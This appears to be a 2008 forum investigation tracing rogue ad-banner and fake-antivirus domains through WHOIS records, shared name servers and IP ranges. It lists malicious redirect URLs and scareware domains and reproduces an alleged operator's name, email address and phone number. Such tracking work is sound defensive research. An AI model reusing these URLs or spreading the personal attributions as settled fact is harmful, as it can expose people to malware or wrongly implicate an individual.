NS5.IXWEBHOSTING.COM
NS6.IXWEBHOSTING.COM

Related domains and mailservers

Extra reading

Inside Rogue Flash Ads, by Dennis Elser and Micha Pekrul, Secure Computing Corporation.

Every day new banners and / or websites show up, we all need your help.

iexplorer-security.org - 84.252.148.219

Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Created: 2008-01-12
Expires: 2010-01-12
Whois Server: whois.pir.org
Dedicated Hosting: iexplorer-security.org is hosted on a dedicated server.

Domain ID:D150624483-LROR
Domain Name:IEXPLORER-SECURITY.ORG
Created On:12-Jan-2008 14:16:26 UTC
Last Updated On:15-Jan-2008 10:31:03 UTC
Expiration Date:12-Jan-2010 14:16:26 UTC
Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

Name Server:MANAGEDNS1.ESTBOXES.COM
Name Server:MANAGEDNS2.ESTBOXES.COM
Name Server:MANAGEDNS3.ESTBOXES.COM
Name Server:MANAGEDNS4.ESTBOXES.COM

domains sharing nameservers.

• 1vipstar.com
• 2007postcards.com
• abalmasov.com
• absolute-space.net
• actualbandwidth.net
• albanino.com
• anetwork.net
• anothercoolpoint.net
• antispygolden.com
• archhistory.net
• auto-zapchasti.com
• awmutils.com
• beloni.net
• best4all.net
• blindsearch.net
• bodyresearch.net
• carding666.com
• central-office.net
• classicmotiontheory.net
• classicphyschapter.net
• coherentsource.net
• compromat.net
• dolanare.com
• egi-service.com
• electricalimput.net
• estexpired.com
• estparking.com
• fafind.com
• fastmediaservice.com
• fetisches.com
• for-movies.net
• funzor.net
• garybrolsma.net
• gayshunks.com
• goldcoders.com
• googlerankigs.com
• hiramaxthumbs.com
• hirosh.net
• hitvirus.com
• htraf.com
• i-wns.com
• joindreams.com
• kar-textiles.com
• klikfeed.com
• klikrevenue.com
• kompromat.net
• kytoon.com
• laser-modules.net
• loguestbook.ws
• lost-civilizations.net
• loventity.com
• lowbandwidth.net
• lowscaleworld.net
• malwareburn.com
• miyana.org
• modernworldview.net
• mp3-planet.net
• mpagii.org
• negativenumber.net
• nelroyltd.com
• newmediadriver.com
• newtonrealtime.net
• nfodb.com
• nfodb.org
• nude-art.net
• ofigeno.net
• onlineheavytheory.net
• opticalassemblies.net
• paydir.com
• peacedata.biz
• pentarh.com
• photonsstream.net
• procodec.com
• prozvon.info
• rape-tgp.net
• resurrect.net
• sanek.info
• slizen.com
• softservice.us
• spycut.com
• spyhazard.com
• stinger911.net
• sunnysex.net
• surfermail.net
• synchrotronsbasic.net
• ultralightbeam.net
• vacuum-energy.net
• vanix.net
• videoforsex.com
• videohook.com
• virusheal.com
• virusranger.com
• wellcams.biz
• wellcams.com
• wz-mail.net
• xl2.net
• xpldev.net
• xxl-cash.com
• yeahsearch.net
• zloy.net
• zolotonio.com
• zxc.net.ua

(only showing 100 results)

adtds2.promoplexer.com - 217.20.175.74

Domain Name: PROMOPLEXER.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Name Server: NS1.VICI.UA
Name Server: NS2.VICI.UA
Status: ok
Updated Date: 04-jan-2008
Creation Date: 05-nov-2007
Expiration Date: 05-nov-2008

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.

1. Macsweeper.com

hostnames sharing ip with a-records.

• macsweeper.com
• ns1.cleanator.com
• ns1.macsweeper.com
• www.macsweeper.com

hostnames beginning with adtds2.

• adtds2.maxconvert.com

domains using this as nameserver.

• cleanator.com
• macsweeper.com

Promoplexer.com - 217.20.175.39

Server Type: Apache/2.0.55 (Ubuntu) PHP/5.1.6
IP Address: 217.20.175.39
IP Location - Kyyiv - Kiev - W Net Isp
Created: 2007-11-05
Expires: 2008-11-05
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 05-Nov-2007
Expiration Date: 05-Nov-2008

Domain servers in listed order:
ns2.vici.ua
ns1.vici.ua

MX alt1.aspmx.l.google.com
64.233.167.27 gsmtp167.google.com
64.233.167.114 gsmtp167-2.google.com

MX alt2.aspmx.l.google.com
209.85.133.27 an-in-f27.google.com
209.85.133.114 an-in-f114.google.com

MX aspmx.l.google.com
66.249.93.27 gsmtp93.google.com
66.249.93.114 gsmtp93-2.google.com

Websites.

1. Maxconvert.com
2. Promoplexer.com

hostnames sharing ip with a-records.

• maxconvert.com
• usin-39.colo2.kv.wnet.ua

domains sharing mailservers.

• 27kb.se
• 27kilobyte.se
• 2friend.com
• 2hc.org
• aanetwork.net
• aaronfitz.info
• abadox.biz
• access9.net
• adaeuro.com
• admugio.com
• akanea.com
• alikadic.com
• alisaglam.com
• alpha-lab.net
• altafandaltaf.com
• annie-and-rob.com
• applinet.com.ar
• araos.cl
• atleticano.com
• backwardslogic.com
• bertelson.us
• bhtele.com
• bigfang.com
• bios-sport.com
• black-panther.us
• bodyextreme.com
• bouallou.com
• caeluspartners.com
• cainelli.com.ar
• calebchen.com
• catalystic.net
• cetin.org
• chadcwaters.com
• chaisong.com
• chrisk.com
• cintriq.com
• cintron.org
• claman.net
• clsrock.com
• codycrew.com
• coimbatorian.com
• complementar.net
• consys.net
• copteaser.com
• corrientesaldia.com.ar
• cowmoo.net
• creamedhoney.com
• cynicalgeeks.com
• deathbylogic.com
• decoma.com.au
• dixonz.com
• drbullock.com
• droegemueller.net
• durabull.co.uk
• duran.org.ar
• echiu.com
• edgarfamily.net
• ehven.com
• elizabethsinteriors.com
• elliott.uk.com
• empathy.net
• enhanceit.com.au
• enthrone.net
• etzich.net
• evilcode.com
• evylle.com
• fazisse.com
• fedro.com
• feuer.ca
• fought.net
• fragzone.se
• fremonianindustries.com
• fupot.com
• fz.se
• galo.net
• geenstijl.nl
• globalconvergence.net
• goldenidol.net
• gsesoft.com
• hackers.net.ua
• hakaveret.co.il
• halladaytrees.com
• hanareha.com
• hangglide.com.au
• hassall.id.au
• hireright.us
• homiez.net
• horstmeier.org
• housingcounseling.net
• ictoan.net
• ifesgulf.com
• immutable.org
• inner-circle.org
• iridia.nl
• irken.net
• jamclam.us
• jclayconstruction.com
• jeffsmall.com
• joshua.net
• juntera.com
• justasisuspected.com
• kathymike.com

(only showing 100 results)

domains sharing nameservers.

• adsraise.com
• clenator.com
• kivvisoftware.com
• maxconvert.com

subdomains.

• *.promoplexer.com
• adtds2.promoplexer.com

As mentioned by Sandi, a couple of new banners have caught our eye. We notice a change in the URL’s of the redirects.

Before.

[domain]/statsa.php?u=[date/time stamp]&campaign=[campaign name]

Example:

• quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni

Now.

[domain]/c/index.php?id=[encrypted string]

Examples:

• station-appraisals.com/c/index.php? id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgN
  mYNkiDgNm
  
  

• staticglobalsources.net/c/index.php? id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aH
  pyYWdim7NkiZQYNkiDgNmYNkiDgNm
  
  

Let's take the 2 lastcomers apart since they reveal some new domains.

1. station-appraisals.com/c/index.php? id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgN
   mYNkiDgNm
   blessedads.com/?cmpid=identifyso
   antivirusforall.com/?tmn=av5&gai=identifyso&gli=&3&mt_info=5586_5581_4577
   
   
2. staticglobalsources.net/c/index.php? id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aH
   pyYWdim7NkiZQYNkiDgNmYNkiDgNm
   waytotheprofit.com/?cmpid=argumentor

New domains.

1. station-appraisals.com
2. staticglobalsources.net
3. waytotheprofit.com

waytotheprofit.com - 76.74.249.30

It's very easy to link this domain to the other players. We notice that blessedads.com and prevedmarketing.com share the same IP with waytotheprofit.com. Colored in orange, domains which did share nameservers with newbieadguide.com (post #4 - Closest Relationships). As a matter of fact, all were hosted on 190.15.73.254 at that time except deuspayment.com.

Websites.

1. Ad2cash.net
2. Ad2profit.com
3. Adcomatoz.com
4. Adgurman.com
5. Adnetserver.com
6. Adredired.com
7. Adsolutio.com
8. Adverdaemon.com
9. Adverlounge.com
10. Adzyclon.com
11. Astalaprofit.com
12. B2adz.com
13. Bizadverts.com
14. Bizmarketads.com
15. Blessedads.com
16. Brandmarketads.com
17. Bucksbill.com
18. Deuspayment.com
19. Friedads.com
20. Glorymarkets.com
21. Iddqdmarketing.com
22. Intervarioclick.com
23. Invulnerableads.com
24. Luckyadcoin.com
25. Luckyadsols.com
26. Moneycometrue.com
27. Mythmarketing.com
28. Popadprovider.com
29. Prevedmarketing.com
30. Rocktheads.com
31. Sharpadverts.com
32. Shivanetworking.com
33. Waytotheprofit.com

Domain Name: WAYTOTHEPROFIT.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.WAYTOTHEPROFIT.COM
Name Server: NS2.WAYTOTHEPROFIT.COM
Status: ok
Updated Date: 03-mar-2008
Creation Date: 02-jul-2007
Expiration Date: 02-jul-2009

Domain : waytotheprofit.com

Registrant Contact Information :
Hostmaster Inc.
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE

Admin Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Tech Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Billing Contact Information :
Contact is identical to Admin

Name Server: NS2.WAYTOTHEPROFIT.COM - 76.74.249.28
Name Server: NS1.WAYTOTHEPROFIT.COM - 76.74.249.29

hostnames sharing ip with a-records & domains sharing nameservers.

• ad2profit.com
• adgurman.com
• adredired.com
• adsolutio.com
• astalaprofit.com
• bizmarketads.com
• brandmarketads.com
• iddqdmarketing.com
• intervarioclick.com
• invulnerableads.com
• luckyadcoin.com
• luckyadsols.com
• mythmarketing.com

subdomains.

• *.waytotheprofit.com
• mail.waytotheprofit.com
• ns1.waytotheprofit.com
• ns2.waytotheprofit.com

ServerBeach ....

station-appraisals.com - 81.93.56.86

Looking at the shared nameservers, it's easy to link station-appraisals.com to the other actors.

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : station-appraisals.com

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

NS1.STATION-APPRAISALS.COM - 202.75.35.72
NS2.STATION-APPRAISALS.COM - 58.65.238.170

hostnames beginning with station-appraisals.

• station-appraisals.net

domains sharing nameservers.

• aboutstat.com
• akamahi.net
• entrerrenglonadura.com
• newstat.net
• officialstat.com
• quinquecahue.com
• stat-diagnostic-imaging.net
• stathisranch.net
• staticglobalsources.com
• station-appraisals.net
• statnation.net
• thetechnorati.com
• vozemiliogaranon.com

subdomains.

• *.station-appraisals.com
• ns1.station-appraisals.com
• ns2.station-appraisals.com

station-appraisals.net - 81.93.56.87
ns1.station-appraisals.net - 202.75.35.72
ns2.station-appraisals.net - 58.65.238.170

staticglobalsources.net - 81.93.56.85

Domain Name: STATICGLOBALSOURCES.NET
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATICGLOBALSOURCES.NET
Name Server: NS2.STATICGLOBALSOURCES.NET
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : staticglobalsources.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

Name Server: NS1.STATICGLOBALSOURCES.NET - 202.75.35.72
Name Server: NS2.STATICGLOBALSOURCES.NET - 58.65.238.170

hostnames beginning with staticglobalsources.

• staticglobalsources.com

domains sharing nameservers

• aboutstat.com
• akamahi.net
• entrerrenglonadura.com
• newstat.net
• officialstat.com
• quinquecahue.com
• stat-diagnostic-imaging.net
• stathisranch.net
• station-appraisals.com
• station-appraisals.net
• statnation.net
• thetechnorati.com
• vozemiliogaranon.com

subdomains.

• *.staticglobalsources.net
• ns1.staticglobalsources.net
• ns2.staticglobalsources.net

staticglobalsources.com - 81.93.56.84
ns1.staticglobalsources.com - 202.75.35.72
ns1.staticglobalsources.com - 202.75.35.72

checking c-net 81.93.56.*

81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
81.93.56.98 mail.mailindustries.eu PTR A - mailindustries.eu A

Why am I not surprised that all those domains except 81.93.56.98 belong to Serg Moon?

DomainTools reveals us the following info :

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains

Something I learned a long time ago .... "poke around" in the closest ranges.

checking c-net 81.93.55.*

One did catch my eye in that block because it's hosted on a nginx/0.4.13 server.

81.93.55.178 - statworld.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

81.93.55.176-81.93.55.183 NL-CUST-DENIT-ID-11372 Denit NL Customer with ID 11372

So I think it's safe to presume that all those IP's belong to Serg Moon also. They will have my full attention in the next days.

Denit Internet Services

% Information related to '81.93.48.0 - 81.93.63.255'

inetnum: 81.93.48.0 - 81.93.63.255
org: ORG-DIS2-RIPE
admin-c: DIT8723-RIPE
netname: NL-DENIT-20060508
descr: Denit Internet Services
country: NL
tech-c: DIT8723-RIPE
status: ALLOCATED PA
notify: ripe@denit.nl
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DENIT-IS-MNT
mnt-routes: DENIT-IS-MNT
changed: hostmaster@ripe.net 20060508
changed: bitbucket@ripe.net 20080125
source: RIPE

organisation: ORG-DIS2-RIPE
org-name: Denit Internet Services
org-type: LIR
address: Denit Internet Services B.V.
Contactweg 131
1014 BJ Amsterdam
NETHERLANDS
phone: +31 20 3372560
fax-no: +31 20 3371802
e-mail: ripe@denit.nl
admin-c: EVER1-RIPE
admin-c: SIMO-RIPE
mnt-ref: DENIT-IS-MNT
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
changed: hostmaster@ripe.net 20040415
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060502
changed: bitbucket@ripe.net 20060508
changed: bitbucket@ripe.net 20070316
changed: bitbucket@ripe.net 20070813
changed: bitbucket@ripe.net 20080125
changed: bitbucket@ripe.net 20080125
source: RIPE

role: DenIT RIPE maintainer role
address: Denit Internet Services BV
address: Contactweg 131
address: 1014 BJ Amsterdam
address: The Netherlands
e-mail: ripe@denit.net
phone: +31 20 3371801
fax-no: +31 20 3371802
notify: ripe@denit.net
admin-c: SIMO-RIPE
tech-c: SIMO-RIPE
nic-hdl: DIT8723-RIPE
mnt-by: DENIT-IS-MNT
remarks: ------------------------------------------
remarks: Send abuse reports to: abuse@denit.net
remarks: Send security reports to: beheer@denit.net
remarks: All other mail to: info@denit.net
remarks: ------------------------------------------
changed: ripe@denit.net 20030103
changed: ripe@denit.net 20031007
source: RIPE

% Information related to '81.93.48.0/20AS25542'

route: 81.93.48.0/20
descr: Denit Networks
origin: AS25542
mnt-by: DENIT-IS-MNT
changed: jsimonetti@denit.net 20070525
source: RIPE
______________________________

Well, right now I need more time to check out all the information found today, fill out the gaps if possible and I still need to check a couple of IP ranges so I will post back if anything new shows up.

Remember I started with this ...

81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A

Reflex - If you see *.com & *.net mixed, look for their vise versa.

81.93.56.73 - aboutstat.net
81.93.56.76 - officialstat.net
81.93.56.77 - stat-diagnostic-imaging.com
81.93.56.81 - stathisranch.com

Doh, bad luck for newstat.com, statnation.com and statsla.com Mr. Moon, they are already taken.

Let's fix the IP block overview first ....

81.93.56.72 aboutstat.com
81.93.56.73 aboutstat.net
81.93.56.74 newstat.net
81.93.56.75 officialstat.com
81.93.56.76 officialstat.net
81.93.56.77 stat-diagnostic-imaging.com
81.93.56.78 stat-diagnostic-imaging.net
81.93.56.79 ?
81.93.56.80 ?
81.93.56.81 stathisranch.com
81.93.56.82 stathisranch.net
81.93.56.83 ?
81.93.56.84 staticglobalsources.com
81.93.56.85 staticglobalsources.net
81.93.56.86 station-appraisals.com
81.93.56.87 station-appraisals.net
81.93.56.88 statnation.net
81.93.56.89 ?
81.93.56.90 ?
81.93.56.91 statsla.net

5 IP's left, 5 gaps to fill.

Stay tuned ... it's not gonna take me long to digg up the remaining stuff if possible.

Let's examine important info (outlined in red below).

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

There were 25 new domains for COMMUNIGAL.NET on 02/01/2008

1. ABOUTSTAT.COM
2. ABOUTSTAT.NET
3. NEWSTAT.NET
4. NIMOONLINE.COM
5. NIMOONLINE.NET
6. NIMOREX.COM
7. NIMOREX.NET
8. OFFICIALSTAT.COM
9. OFFICIALSTAT.NET
10. STAT-DIAGNOSTIC-IMAGING.COM
11. STAT-DIAGNOSTIC-IMAGING.NET
12. STATETSTR.COM
13. STATGROUP.NET
14. STATHISRANCH.COM
15. STATHISRANCH.NET
16. STATHOME.NET
17. STATICGLOBALSOURCES.COM
18. STATICGLOBALSOURCES.NET
19. STATION-APPRAISALS.COM
20. STATION-APPRAISALS.NET
21. STATNATION.NET
22. STATSITE.NET
23. STATSLA.NET
24. STATUAS.NET
25. STATWORLD.NET

Which gives us the following additional domains beloging to Serge Moon.

• 81.93.56.79 statetstr.com
• 81.93.56.80 statgroup.net
• 81.93.56.83 stathome.net
• 81.93.56.88 statsite.net
• 81.93.56.92 statuas.net

Overview.

1. 81.93.56.72 aboutstat.com
2. 81.93.56.73 aboutstat.net
3. 81.93.56.74 newstat.net
4. 81.93.56.75 officialstat.com
5. 81.93.56.76 officialstat.net
6. 81.93.56.77 stat-diagnostic-imaging.com
7. 81.93.56.78 stat-diagnostic-imaging.net
8. 81.93.56.79 statetstr.com
9. 81.93.56.80 statgroup.net
10. 81.93.56.81 stathisranch.com
11. 81.93.56.82 stathisranch.net
12. 81.93.56.83 stathome.net
13. 81.93.56.84 staticglobalsources.com
14. 81.93.56.85 staticglobalsources.net
15. 81.93.56.86 station-appraisals.com
16. 81.93.56.87 station-appraisals.net
17. 81.93.56.88 statnation.net
18. 81.93.56.88 statsite.net
19. 81.93.56.91 statsla.net
20. 81.93.56.92 statuas.net
21. 81.93.55.178 statworld.net

"Serg Moon" owns about 19 other domains....

Remaining.

• 81.93.56.89 ?
• 81.93.56.90 ?

To keep an eye on.

• 81.93.55.176
• 81.93.55.177
• 81.93.55.179
• 81.93.55.180
• 81.93.55.181
• 81.93.55.182
• 81.93.55.183

moon.serg@gmail.com is associated with about 28 domains....

Ready for another journey in advert land ?

Yesterday evening Malekal_morte did ask me if I knew what was creating xml files on a victims computer. In meanwhile he grabbed a copy of an xml file. Kudos for doing that.

My curiosity immediately got picked after seeing the following:


luckyadsols.com shares the same IP as waytotheprofit.com, blessedads.com, prevedmarketing.com as seen earlier.
Other interesting elements present in the xml file are:

• CAMPAIGN name=[name] id=[number] - there are 4 of them
• 83.149.105.113
• 91.184.6.104
• pagead2\.googlesyndication\.com
• ahahoo.com

Full code below, I just did scrable the encrypted IP. A screenshot is available here because the code is easier to follow.